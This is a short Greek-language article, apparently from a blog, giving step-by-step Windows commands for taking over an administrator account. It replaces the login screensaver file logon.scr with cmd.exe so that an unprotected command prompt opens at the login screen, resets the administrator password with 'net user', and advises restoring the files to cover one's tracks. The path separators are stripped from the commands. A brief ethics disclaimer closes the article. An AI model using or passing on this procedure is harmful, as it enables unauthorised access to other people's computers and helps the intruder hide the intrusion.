Tοξικά μέρη στον κόσμο..

Πώς αποκτούμε πρόσβαση σε λογαριασμό διαχειριστή κάποιου υπολογιστή


Σε αυτό το σύντομο άρθρο θα δείξουμε πως μπορείτε να αποκτήστε πρόσβαση σε έναν οποιονδήποτε λογαριασμό χρήστη στον υπολογιστή και ανοίξτε ένα παράθυρο DOS (κλικ στο “Έναρξη” -> “Εκτέλεση” -> Πληκτρολογήστε “CMD”) και γράψτε, τις παρακάτω εντολές:





cdwindowssystem32 
mkdir hackdir 
copy logon.scr hackdirlogon.scr 
copy cmd.exe hackdircmd.exe 
del logon.scr 
rename cmd.exe logon.scr 
exit 

Αυτό που μόλις κάνετε, είναι:

Μπήκατε στον φάκελο system32. 
Δημιουργήσατε έναν φάκελο με όνομα hackdir. 
Αντιγράψατε το αρχείο logon.scr μέσα στον φάκελο hackdir. 
Αντιγράψατε το αρχείο cmd.exe μέσα στον φάκελο hackdir. 
Διαγράψατε το αρχείο logon.scr μέσα από το system32.
Κάνατε μετονομασία το cmd.exe σε logon.scr
Κλείσατε το παράθυρο του DOS.

Αποτέλεσμα όλων αυτών των εντολών είναι ότι αντικαταστήσατε το default Screensaver των Windows με το cmd.exe. Στην επόμενη εκκίνηση του υπολογιστή, στην οθόνη επιλογής χρήστη, θα περιμένετε μέχρι να εμφανιστεί το Screensaver, που δεν θα είναι άλλο από μια γραμμή εντολών του DOS, χωρίς καμιά απολύτως προστασία. Αφού ανοίξει το παράθυρο του DOS πληκτρολογήστε την παρακάτω εντολή:
net user <όνομα λογαριασμού Administrator> <νέο κωδικό> παράδειγμα αν το όνομα του λογαριασμού του Admin είναι “Administrator ή κάτι άλλο” και σαν κωδικό θέλετε το “123456” τότε γράφετε: net user Administrator 123456.

Μόλις αλλάξατε τον κωδικό του Admin από οτιδήποτε ήταν, σε 123456. Μην ξεχάσετε να μεταφέρετε τα αρχεία (cmd.exe, logon.scr) ξανά στον φάκελο system32, έτσι ώστε να καλύψετε τα ίχνη σας για να μην σας καταλάβει κανείς.

# Μη ξεχνάτε να χρησιμοποιείτε τα παραπάνω βήματα σύμφωνα με την δεοντολογία ενός έμπειρου προγραμματιστή ή hacker. Πιο συγκεκριμένα μην χρησιμοποιείται τις παραπάνω πληροφορίες προκειμένου να βλάψετε.Τέλος οι παραπάνω οδηγίες αφορούν μόνο την πρόσβαση σε υπολογιστή με λογισμικό Windows.